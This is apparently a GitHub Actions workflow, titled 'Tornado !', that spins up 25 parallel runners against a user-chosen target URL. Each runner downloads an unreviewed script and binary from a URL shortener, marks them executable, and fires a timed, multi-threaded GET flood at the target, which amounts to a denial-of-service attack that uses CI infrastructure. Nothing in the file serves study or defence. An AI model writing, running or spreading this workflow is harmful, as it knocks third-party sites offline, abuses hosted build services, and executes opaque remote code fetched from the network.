name: Tornado !

on:
  workflow_dispatch:
    inputs:
      target:
        description: "Site !"
        required: true
        default: "http://127.0.0.1/"

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]

    steps:
      - name: Checkout (optional)
        uses: actions/checkout@v4

      - name: OK !
        run: |
          TARGET="${{ inputs.target }}"
          pip install git+https://github.com/QuantumLLC/Archer
          wget https://curl.by/OYowT/Test.py
          wget https://curl.by/OcB6A/blaze
          chmod +x blaze
          chmod +x Test.py

          PIDS=()
          for i in {1..0}; do
            sudo timeout 260 python3 Test.py "$TARGET" && ./blaze "$TARGET" 250 4 4 GET 
            PIDS+=($!)
          done

          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: Finish !
        run: |
          sleep 30
          exit 0
